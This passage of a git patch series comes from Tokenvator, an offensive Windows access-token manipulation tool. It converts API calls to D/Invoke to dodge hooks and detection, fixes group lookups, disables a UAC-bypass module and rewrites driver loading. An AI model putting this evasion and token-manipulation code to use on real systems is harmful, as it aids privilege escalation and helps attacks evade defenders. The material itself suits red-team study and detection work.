+        /// <summary>
+        /// SID Lookup Wrapper
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="logonDomain"></param>
+        /// <param name="userName"></param>
+        /// <param name="hSid"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         private static bool _LookupSid(string logonDomain, string userName, ref IntPtr hSid)
         {
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+
+            ////////////////////////////////////////////////////////////////////////////////
+            //advapi32.LookupAccountName(lpSystemName, lpAccountName, hSid, ref cbSid, lpReferencedDomainName, ref cchReferencedDomainName, out peUse);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hLookupAccountNameW = Generic.GetExportAddress(hadvapi32, "LookupAccountNameW");
+            MonkeyWorks.advapi32.LookupAccountNameW fLookupAccountNameW = (MonkeyWorks.advapi32.LookupAccountNameW)Marshal.GetDelegateForFunctionPointer(hLookupAccountNameW, typeof(MonkeyWorks.advapi32.LookupAccountNameW));
 
             StringBuilder lpSystemName = new StringBuilder(logonDomain);
             StringBuilder lpAccountName = new StringBuilder(userName);
@@ -814,29 +1135,47 @@ private static bool _LookupSid(string logonDomain, string userName, ref IntPtr h
             uint cchReferencedDomainName = 0;
             Winnt._SID_NAME_USE peUse = new Winnt._SID_NAME_USE();
 
-            //Console.WriteLine(" - LookupAccountName");
-            advapi32.LookupAccountName(
-                lpSystemName,
-                lpAccountName,
-                hSid,
-                ref cbSid,
-                lpReferencedDomainName,
-                ref cchReferencedDomainName,
-                out peUse
-            );
+            try
+            {
+                fLookupAccountNameW(
+                    lpSystemName,
+                    lpAccountName,
+                    hSid,
+                    ref cbSid,
+                    lpReferencedDomainName,
+                    ref cchReferencedDomainName,
+                    out peUse
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] LookupAccountNameW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+            }
 
             hSid = Marshal.AllocHGlobal((int)cbSid);
             lpReferencedDomainName.EnsureCapacity((int)cchReferencedDomainName);
 
-            bool retVal = advapi32.LookupAccountName(
-                lpSystemName,
-                lpAccountName,
-                hSid,
-                ref cbSid,
-                lpReferencedDomainName,
-                ref cchReferencedDomainName,
-                out peUse
-            );
+            bool retVal = false;
+            try
+            {
+                retVal = fLookupAccountNameW(
+                    lpSystemName,
+                    lpAccountName,
+                    hSid,
+                    ref cbSid,
+                    lpReferencedDomainName,
+                    ref cchReferencedDomainName,
+                    out peUse
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] LookupAccountNameW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                Marshal.FreeHGlobal(hSid);
+                return false;
+            }
 
             if (!retVal)
             {
@@ -844,32 +1183,78 @@ out peUse
                 return false;
             }
 
+            string sddl = _PrintStringSID(hSid);
+            /*
+            ///////////////////////////////////////////////////////////////////////////////
+            //advapi32.ConvertSidToStringSid(hSid, ref hStringUserSid);
+            ///////////////////////////////////////////////////////////////////////////////
+            IntPtr hConvertSidToStringSidW = Generic.GetExportAddress(hadvapi32, "ConvertSidToStringSidW");
+            MonkeyWorks.advapi32.ConvertSidToStringSidW fConvertSidToStringSidW = (MonkeyWorks.advapi32.ConvertSidToStringSidW)Marshal.GetDelegateForFunctionPointer(hConvertSidToStringSidW, typeof(MonkeyWorks.advapi32.ConvertSidToStringSidW));
+
             IntPtr hStringUserSid = IntPtr.Zero;
-            advapi32.ConvertSidToStringSid(hSid, ref hStringUserSid);
+
+            try
+            {
+                fConvertSidToStringSidW(ref hSid, ref hStringUserSid);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] LookupAccountNameW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+            }
             string sddl = Marshal.PtrToStringAuto(hStringUserSid);
+            
+            */
             Console.WriteLine(" [+] {0} {1}", sddl, lpAccountName.ToString());
 
             return true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Wrapper for AllocateAndInitializeSid - Hardest Possible way of doing it
+        /// <summary>
+        /// Wrapper for AllocateAndInitializeSid - Hardest Possible way of doing it
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="authority"></param>
+        /// <param name="subAuthority"></param>
+        /// <param name="psid"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         private static bool InitializeSid(Winnt._SID_IDENTIFIER_AUTHORITY authority, uint[] subAuthority, ref IntPtr psid)
         {
-            //Console.WriteLine("AllocateAndInitializeSid");
-            bool retVal = advapi32.AllocateAndInitializeSid(
-                ref authority,
-                1,
-                subAuthority[0],
-                subAuthority[1],
-                subAuthority[2],
-                subAuthority[3],
-                subAuthority[4],
-                subAuthority[5],
-                subAuthority[6],
-                subAuthority[7],
-                out psid);
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // fAllocateAndInitializeSid(ref authority, 1, subAuthority[0], subAuthority[1], subAuthority[2], subAuthority[3], subAuthority[4], subAuthority[5], subAuthority[6], subAuthority[7], out psid);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hAllocateAndInitializeSid = Generic.GetExportAddress(hadvapi32, "AllocateAndInitializeSid");
+            MonkeyWorks.advapi32.AllocateAndInitializeSid fAllocateAndInitializeSid = (MonkeyWorks.advapi32.AllocateAndInitializeSid)Marshal.GetDelegateForFunctionPointer(hAllocateAndInitializeSid, typeof(MonkeyWorks.advapi32.AllocateAndInitializeSid));
+
+            bool retVal = false;
+            try
+            {
+                retVal = fAllocateAndInitializeSid(
+                    ref authority,
+                    1,
+                    subAuthority[0],
+                    subAuthority[1],
+                    subAuthority[2],
+                    subAuthority[3],
+                    subAuthority[4],
+                    subAuthority[5],
+                    subAuthority[6],
+                    subAuthority[7],
+                    out psid
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] AllocateAndInitializeSid Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
 
             if (!retVal)
             {
@@ -877,18 +1262,20 @@ private static bool InitializeSid(Winnt._SID_IDENTIFIER_AUTHORITY authority, uin
                 return false;
             }
 
-            IntPtr hStringUserSid = IntPtr.Zero;
-            advapi32.ConvertSidToStringSid(psid, ref hStringUserSid);
-            string sddl = Marshal.PtrToStringAuto(hStringUserSid);
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.ConvertSidToStringSid(psid, ref hStringUserSid);
+            ////////////////////////////////////////////////////////////////////////////////
+            string sddl = _PrintStringSID(psid);
+
             string accountName = string.Empty;
             try
             {
-                accountName = new System.Security.Principal.SecurityIdentifier(sddl)
-                    .Translate(typeof(System.Security.Principal.NTAccount)).ToString();
+                accountName = new SecurityIdentifier(sddl).Translate(typeof(NTAccount)).ToString();
             }
-            catch (System.Security.Principal.IdentityNotMappedException ex)
+            catch (IdentityNotMappedException ex)
             {
-                Console.WriteLine(ex.Message);
+                Console.WriteLine("[-] SecurityIdentifier.Translate Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
             }
 
             Console.WriteLine("   - " + accountName + " " + sddl);
@@ -896,11 +1283,37 @@ private static bool InitializeSid(Winnt._SID_IDENTIFIER_AUTHORITY authority, uin
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Wrapper for AllocateAndInitializeSid
+        /// <summary>
+        /// Wrapper for AllocateAndInitializeSid
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="sddl"></param>
+        /// <param name="psid"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public static bool InitializeSid(string sddl, ref IntPtr psid)
         {
-            bool retVal = advapi32.ConvertStringSidToSidW(sddl, ref psid);
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // bool retVal = advapi32.ConvertStringSidToSidW(sddl, ref psid);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hConvertStringSidToSidW = Generic.GetExportAddress(hadvapi32, "ConvertStringSidToSidW");
+            MonkeyWorks.advapi32.ConvertStringSidToSidW fConvertStringSidToSidW = (MonkeyWorks.advapi32.ConvertStringSidToSidW)Marshal.GetDelegateForFunctionPointer(hConvertStringSidToSidW, typeof(MonkeyWorks.advapi32.ConvertStringSidToSidW));
+
+            bool retVal = false;
+            try
+            {
+                retVal = fConvertStringSidToSidW(sddl, ref psid);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] ConvertStringSidToSidW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
 
             if (!retVal)
             {
@@ -915,10 +1328,11 @@ public static bool InitializeSid(string sddl, ref IntPtr psid)
             }
             catch (IdentityNotMappedException ex)
             {
-                Console.WriteLine(ex.Message);
+                Console.WriteLine("[-] SecurityIdentifier.Translate Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
             }
 
-            Console.WriteLine(" [+] {0} {1}", sddl, accountName);
+            Console.WriteLine(" [+] {0,-20} {1}", sddl, accountName);
             return true;
         }
     }
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index e827289..0f2937d 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -14,7 +14,7 @@
 using Tokenvator.Plugins.Execution;
 
 using MonkeyWorks.Unmanaged.Headers;
-//using MonkeyWorks.Unmanaged.Libraries;
+using MonkeyWorks.Unmanaged.Libraries;
 
 namespace Tokenvator.Plugins.AccessTokens
 {
@@ -246,14 +246,14 @@ public void LogonUser(string domain, string username, string password, Winbase.L
 
             IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
             IntPtr hLogonUserW = Generic.GetExportAddress(hadvapi32, "LogonUserW");
-            MonkeyWorks.advapi32.LogonUserW fLLogonUserW = (MonkeyWorks.advapi32.LogonUserW)Marshal.GetDelegateForFunctionPointer(hLogonUserW, typeof(MonkeyWorks.advapi32.LogonUserW));
+            MonkeyWorks.advapi32.LogonUserW fLogonUserW = (MonkeyWorks.advapi32.LogonUserW)Marshal.GetDelegateForFunctionPointer(hLogonUserW, typeof(MonkeyWorks.advapi32.LogonUserW));
 
             bool retVal = false;
             try
             {
-                fLLogonUserW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, out hExistingToken);
+                retVal = fLogonUserW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, out hExistingToken);
             }
-            catch(Exception ex)
+            catch (Exception ex)
             {
                 Console.WriteLine("[-] LogonUserW Generated an Exception");
                 Console.WriteLine("[-] {0}", ex.Message);
@@ -335,12 +335,12 @@ public void LogonUser(string domain, string username, string password, string gr
 
             IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
             IntPtr hLogonUserExExW = Generic.GetExportAddress(hadvapi32, "LogonUserExExW");
-            MonkeyWorks.advapi32.LogonUserExExW fLLogonUserW = (MonkeyWorks.advapi32.LogonUserExExW)Marshal.GetDelegateForFunctionPointer(hLogonUserExExW, typeof(MonkeyWorks.advapi32.LogonUserExExW));
+            MonkeyWorks.advapi32.LogonUserExExW fLogonUserW = (MonkeyWorks.advapi32.LogonUserExExW)Marshal.GetDelegateForFunctionPointer(hLogonUserExExW, typeof(MonkeyWorks.advapi32.LogonUserExExW));
 
             bool retVal = false;
             try
             {
-                fLLogonUserW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, ref tokenGroups, out hExistingToken, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
+                retVal = fLogonUserW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, ref tokenGroups, out hExistingToken, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
             }
             catch(Exception ex)
             {
diff --git a/Tokenvator/Resources/Misc.cs b/Tokenvator/Resources/Misc.cs
index 00e96c8..a6edfed 100644
--- a/Tokenvator/Resources/Misc.cs
+++ b/Tokenvator/Resources/Misc.cs
@@ -64,6 +64,22 @@ public static void GetLsaNtError(string location, uint ntError)
             Console.WriteLine(" [-] {0}", new System.ComponentModel.Win32Exception((int)win32Error).Message);
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        ////////////////////////////////////////////////////////////////////////////////
+        public static void GetNetApiError(string location, uint netError)
+        {
+            if (1722 == netError)
+            {
+                Console.WriteLine("[*] Unable to contact Domain Controller");
+            }
+            else
+            {
+                Console.WriteLine(" [-] Function {0} failed: ", location);
+                Console.WriteLine(" [-] {0}", (MonkeyWorks.Unmanaged.Libraries.DInvoke.netapi32.NET_API_STATUS)netError);
+
+            }
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         ////////////////////////////////////////////////////////////////////////////////
         public static void GetNtError(string location, uint ntError)

From 957f9f4bca2c409bfe415b462bae9ff4f79f84f0 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Wed, 1 Sep 2021 10:51:43 -0500
Subject: [PATCH 13/36] Janky fix for NetUserGetGroups GetExportAddress
 failures

---
 .../Plugins/AccessTokens/CreateTokens.cs      | 76 ++++++++++++-------
 1 file changed, 50 insertions(+), 26 deletions(-)

diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index 9df0f02..8c7f2ab 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -5,6 +5,8 @@
 using System.Text;
 
 using DInvoke.DynamicInvoke;
+using DInvoke.ManualMap;
+using DInvoke.Data;
 
 using Tokenvator.Resources;
 using Tokenvator.Plugins.Enumeration;
@@ -518,11 +520,13 @@ private bool CreateTokenUser(string domain, string userName, out Ntifs._TOKEN_US
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Creates the TOKEN_GROUPS Structure
-        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress/LoadModuleFromDisk
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
         /// </summary>
         /// <param name="command"></param>
         /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         internal bool CreateTokenGroups(string domain, string userName, out Ntifs._TOKEN_GROUPS tokenGroups, out Winnt._TOKEN_PRIMARY_GROUP tokenPrimaryGroup, string[] groups)
         {
             Console.WriteLine("[*] _TOKEN_GROUPS");
@@ -531,6 +535,11 @@ internal bool CreateTokenGroups(string domain, string userName, out Ntifs._TOKEN
             tokenGroups.Initialize();
             tokenPrimaryGroup = new Winnt._TOKEN_PRIMARY_GROUP();
 
+            uint LG_INCLUDE_INDIRECT = 0x0001;
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // hnetapi32 = kernel32.LoadLibrary("netapi32.dll");
+            ////////////////////////////////////////////////////////////////////////////////
             IntPtr hnetapi32 = Generic.GetPebLdrModuleEntry("netapi32.dll");
             if (IntPtr.Zero == hnetapi32)
             {
@@ -542,35 +551,50 @@ internal bool CreateTokenGroups(string domain, string userName, out Ntifs._TOKEN
                 }
             }
 
-            uint LG_INCLUDE_INDIRECT = 0x0001;
+            ////////////////////////////////////////////////////////////////////////////////
+            // GetExportAddress was returning the wrong address for NetUserGetLocalGroups
+            // Using Kernel32.GetProcAddress which was returning the correct address
+            // IntPtr hNetUserGetLocalGroups2 = kernel32.GetProcAddress(hnetapi32, "NetUserGetLocalGroups");
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+            IntPtr hGetProcAddress = Generic.GetExportAddress(hkernel32, "GetProcAddress");
+            MonkeyWorks.kernel32.GetProcAddress fGetProcAddress = (MonkeyWorks.kernel32.GetProcAddress)Marshal.GetDelegateForFunctionPointer(hGetProcAddress, typeof(MonkeyWorks.kernel32.GetProcAddress));            
+    
+            #region NetUserGetLocalGroups       
+            IntPtr hNetUserGetLocalGroups = IntPtr.Zero;
+            try
+            {
+                hNetUserGetLocalGroups = fGetProcAddress(hnetapi32, "NetUserGetLocalGroups");
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] GetProcAddress Generated an Exception");
+                Console.WriteLine(ex.Message);
+            }
+
+            /*
+            byte[] bytes = System.IO.File.ReadAllBytes(@"C:\Windows\System32\netapi32.dll");
+            PE.PE_MANUAL_MAP ManMapTest3 = Map.MapModuleToMemory(bytes);
+            Generic.CallMappedDLLModule(ManMapTest3.PEINFO, ManMapTest3.ModuleBase);
+            hNetUserGetLocalGroups = Generic.GetExportAddress(hnetapi32, 240);
+            fNetUserGetLocalGroups = (MonkeyWorks.netapi32.NetUserGetLocalGroups)Marshal.GetDelegateForFunctionPointer(hNetUserGetLocalGroups, typeof(MonkeyWorks.netapi32.NetUserGetLocalGroups));
+            */
 
-            #region NetUserGetLocalGroups
             ////////////////////////////////////////////////////////////////////////////////
+            // This failed hard with directly calling GetExportAddress against hnetapi32
             // ntRetVal = netapi32.NetUserGetLocalGroups(domain, userName.ToLower(), 0, LG_INCLUDE_INDIRECT, out bufPtr, -1, ref localEntriesRead, ref localTotalEntriesRead);
             ////////////////////////////////////////////////////////////////////////////////
-            IntPtr hNetUserGetLocalGroups = Generic.GetExportAddress(hnetapi32, "NetUserGetLocalGroups");
-            MonkeyWorks.netapi32.NetUserGetLocalGroups fNetUserGetLocalGroups = (MonkeyWorks.netapi32.NetUserGetLocalGroups)Marshal.GetDelegateForFunctionPointer(hNetUserGetLocalGroups, typeof(MonkeyWorks.netapi32.NetUserGetLocalGroups));
-
             lmaccess._LOCALGROUP_USERS_INFO_0[] localgroupUserInfo;
             IntPtr bufPtr = IntPtr.Zero;
 
-            uint ntRetVal = netapi32.NetUserGetLocalGroups(
-                domain,
-                userName.ToLower(),
-                0,
-                LG_INCLUDE_INDIRECT,
-                out bufPtr,
-                -1,
-                ref localEntriesRead,
-                ref localTotalEntriesRead
-            );
+            MonkeyWorks.netapi32.NetUserGetLocalGroups fNetUserGetLocalGroups = (MonkeyWorks.netapi32.NetUserGetLocalGroups)Marshal.GetDelegateForFunctionPointer(hNetUserGetLocalGroups, typeof(MonkeyWorks.netapi32.NetUserGetLocalGroups));
 
-            /*
+            uint netRetVal = 0;
             try
             {
-                ntRetVal = fNetUserGetLocalGroups(
-                    domain,
-                    userName.ToLower(),
+                netRetVal = fNetUserGetLocalGroups(
+                    ref domain,
+                    ref userName,
                     0,
                     LG_INCLUDE_INDIRECT,
                     out bufPtr,
@@ -584,10 +608,10 @@ ref localTotalEntriesRead
                 Console.WriteLine("[-] NetUserGetLocalGroups Generated an Exception");
                 Console.WriteLine(ex);
             }
-            */
-            if (0 != ntRetVal)
+
+            if (0 != netRetVal)
             {
-                Misc.GetNetApiError("NetUserGetLocalGroups", ntRetVal);
+                Misc.GetNetApiError("NetUserGetLocalGroups", netRetVal);
 
             }
 
@@ -621,7 +645,7 @@ ref localTotalEntriesRead
             lmaccess._GROUP_USERS_INFO_0[] globalGroupUserInfo;
             try
             {
-                ntRetVal = netapi32.NetUserGetGroups(
+                netRetVal = netapi32.NetUserGetGroups(
                     domain,
                     userName.ToLower(),
                     0,
@@ -637,9 +661,9 @@ ref globalEotalEntriesRead
                 Console.WriteLine(ex.Message);
             }
 
-            if (0 != ntRetVal)
+            if (0 != netRetVal)
             {
-                Misc.GetNetApiError("NetUserGetGroups", ntRetVal);
+                Misc.GetNetApiError("NetUserGetGroups", netRetVal);
             }
 
             globalGroupUserInfo = new lmaccess._GROUP_USERS_INFO_0[globalEntriesRead];

From 620bba2a0a7cf2d4388ba2cc270e071dfcfbf19c Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Wed, 1 Sep 2021 10:56:02 -0500
Subject: [PATCH 14/36] Implementing the fix for NetUserGetGroups

---
 .../Plugins/AccessTokens/CreateTokens.cs      | 34 +++++++++++++------
 1 file changed, 23 insertions(+), 11 deletions(-)

diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index 8c7f2ab..8a6b554 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -1,20 +1,17 @@
 using System;
 using System.Collections.Generic;
+using System.Runtime.ExceptionServices;
 using System.Runtime.InteropServices;
+using System.Security;
 using System.Security.Principal;
 using System.Text;
 
 using DInvoke.DynamicInvoke;
-using DInvoke.ManualMap;
-using DInvoke.Data;
 
 using Tokenvator.Resources;
 using Tokenvator.Plugins.Enumeration;
 
 using MonkeyWorks.Unmanaged.Headers;
-using System.Runtime.ExceptionServices;
-using System.Security;
-using MonkeyWorks.Unmanaged.Libraries;
 
 namespace Tokenvator.Plugins.AccessTokens
 {
@@ -554,13 +551,15 @@ internal bool CreateTokenGroups(string domain, string userName, out Ntifs._TOKEN
             ////////////////////////////////////////////////////////////////////////////////
             // GetExportAddress was returning the wrong address for NetUserGetLocalGroups
             // Using Kernel32.GetProcAddress which was returning the correct address
-            // IntPtr hNetUserGetLocalGroups2 = kernel32.GetProcAddress(hnetapi32, "NetUserGetLocalGroups");
             ////////////////////////////////////////////////////////////////////////////////
             IntPtr hkernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
             IntPtr hGetProcAddress = Generic.GetExportAddress(hkernel32, "GetProcAddress");
-            MonkeyWorks.kernel32.GetProcAddress fGetProcAddress = (MonkeyWorks.kernel32.GetProcAddress)Marshal.GetDelegateForFunctionPointer(hGetProcAddress, typeof(MonkeyWorks.kernel32.GetProcAddress));            
-    
-            #region NetUserGetLocalGroups       
+            MonkeyWorks.kernel32.GetProcAddress fGetProcAddress = (MonkeyWorks.kernel32.GetProcAddress)Marshal.GetDelegateForFunctionPointer(hGetProcAddress, typeof(MonkeyWorks.kernel32.GetProcAddress));
+
+            #region NetUserGetLocalGroups    
+            ////////////////////////////////////////////////////////////////////////////////
+            // IntPtr hNetUserGetLocalGroups = kernel32.GetProcAddress(hnetapi32, "NetUserGetLocalGroups");
+            ////////////////////////////////////////////////////////////////////////////////
             IntPtr hNetUserGetLocalGroups = IntPtr.Zero;
             try
             {
@@ -636,16 +635,29 @@ ref localTotalEntriesRead
             #endregion
 
             #region NetUserGetGroups
+            ////////////////////////////////////////////////////////////////////////////////
+            // IntPtr hNetUserGetGroups = kernel32.GetProcAddress(hnetapi32, "NetUserGetGroups");
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hNetUserGetGroups = IntPtr.Zero;
+            try
+            {
+                hNetUserGetGroups = fGetProcAddress(hnetapi32, "NetUserGetGroups");
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] GetProcAddress Generated an Exception");
+                Console.WriteLine(ex.Message);
+            }
+
             ////////////////////////////////////////////////////////////////////////////////
             //netapi32.NetUserGetGroups(domain, userName.ToLower(), 0, out bufPtr, -1, ref globalEntriesRead, ref globalEotalEntriesRead);
             ////////////////////////////////////////////////////////////////////////////////
-            IntPtr hNetUserGetGroups = Generic.GetExportAddress(hnetapi32, "NetUserGetGroups");
             MonkeyWorks.netapi32.NetUserGetGroups fNetUserGetGroups = (MonkeyWorks.netapi32.NetUserGetGroups)Marshal.GetDelegateForFunctionPointer(hNetUserGetGroups, typeof(MonkeyWorks.netapi32.NetUserGetGroups));
 
             lmaccess._GROUP_USERS_INFO_0[] globalGroupUserInfo;
             try
             {
-                netRetVal = netapi32.NetUserGetGroups(
+                netRetVal = fNetUserGetGroups(
                     domain,
                     userName.ToLower(),
                     0,

From 566c740e397dd6dee57d23e8c8da630c7074feb6 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Wed, 1 Sep 2021 15:39:55 -0500
Subject: [PATCH 15/36] Converted TokenDriver, Removed Inline DesktopACL
 P/Invokes, Deprecated RestrictedTokens

---
 Tokenvator/MainLoop.Modules.cs                |   2 +
 Tokenvator/MainLoop.cs                        |   2 +
 .../Plugins/AccessTokens/TokenDriver.cs       | 103 ++++-
 Tokenvator/Plugins/Enumeration/DesktopACL.cs  | 401 +++---------------
 Tokenvator/Resources/Misc.cs                  |   1 -
 Tokenvator/Tokenvator.csproj                  |   5 +-
 6 files changed, 148 insertions(+), 366 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index 7cc71e7..223ebd8 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -111,6 +111,7 @@ private static void _AlterPrivilege(CommandLineParsing cLP, IntPtr hToken, Winnt
         ////////////////////////////////////////////////////////////////////////////////
         // UAC Token Magic - Deprecated
         ////////////////////////////////////////////////////////////////////////////////
+        /*
         private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
         {
             Console.WriteLine("[*] Notice: This no longer working on versions of Windows 10 > 1703");
@@ -135,6 +136,7 @@ private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
                 }
             }
         }
+        */
 
         ////////////////////////////////////////////////////////////////////////////////
         //
diff --git a/Tokenvator/MainLoop.cs b/Tokenvator/MainLoop.cs
index 2e9825e..ac7ff9b 100644
--- a/Tokenvator/MainLoop.cs
+++ b/Tokenvator/MainLoop.cs
@@ -159,9 +159,11 @@ internal void Run()
                     case "add_privilege":
                         _AddPrivilege(cLP);
                         break;
+                        /*
                     case "bypassuac":
                         _BypassUAC(cLP, hToken);
                         break;
+                        */
                     case "clear_desktop_acl":
                         _ClearDesktopACL();
                         break;
diff --git a/Tokenvator/Plugins/AccessTokens/TokenDriver.cs b/Tokenvator/Plugins/AccessTokens/TokenDriver.cs
index 72ba29e..95536f4 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenDriver.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenDriver.cs
@@ -1,18 +1,24 @@
 using System;
 using System.Linq;
+using System.Runtime.ExceptionServices;
 using System.Runtime.InteropServices;
+using System.Security;
 using System.Text;
 using Microsoft.Win32;
 using Microsoft.Win32.SafeHandles;
 
+using DInvoke.DynamicInvoke;
+
 using Tokenvator.Resources;
 
 using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
+//using MonkeyWorks.Unmanaged.Libraries;
 
 
 namespace Tokenvator.Plugins.AccessTokens
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     class TokenDriver : IDisposable
     {
         internal enum PRIVILEGES : ulong
@@ -353,37 +359,100 @@ public bool LoadDriverNt(string lpBinaryPathName)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Creates and loads a driver
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="lpBinaryPathName"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public bool LoadDriverSC(string lpBinaryPathName)
         {
-            IntPtr hSCManager = advapi32.OpenSCManager(
-                string.Empty,
-                string.Empty, 
-                Winsvc.dwSCManagerDesiredAccess.SC_MANAGER_CREATE_SERVICE
-            );
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.OpenSCManager(string.Empty,string.Empty, Winsvc.dwSCManagerDesiredAccess.SC_MANAGER_CREATE_SERVICE);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hOpenSCManager = Generic.GetExportAddress(hadvapi32, "OpenSCManagerW");
+            MonkeyWorks.advapi32.OpenSCManagerW fOpenSCManager = (MonkeyWorks.advapi32.OpenSCManagerW)Marshal.GetDelegateForFunctionPointer(hOpenSCManager, typeof(MonkeyWorks.advapi32.OpenSCManagerW));
+
+            IntPtr hSCManager = IntPtr.Zero;
+            try
+            {
+                hSCManager = fOpenSCManager(
+                    string.Empty,
+                    string.Empty,
+                    Winsvc.dwSCManagerDesiredAccess.SC_MANAGER_CREATE_SERVICE
+                );
+            }
+            catch(Exception ex)
+            {
+                Console.WriteLine("[-] OpenSCManagerW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+
             if (IntPtr.Zero == hSCManager)
             {
                 Misc.GetWin32Error("OpenSCManager");
                 return false;
             }
 
-            IntPtr hService = advapi32.CreateService(
-                hSCManager,
-                "ScTokenDriver", "ScTokenDriver",
-                Winsvc.dwDesiredAccess.SERVICE_START,
-                Winsvc.dwServiceType.SERVICE_KERNEL_DRIVER,
-                Winsvc.dwStartType.SERVICE_DEMAND_START,
-                Winsvc.dwErrorControl.SERVICE_ERROR_NORMAL,
-                lpBinaryPathName,
-                string.Empty, string.Empty, string.Empty, string.Empty, string.Empty
-            );
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.OpenSCManager(string.Empty,string.Empty, Winsvc.dwSCManagerDesiredAccess.SC_MANAGER_CREATE_SERVICE);
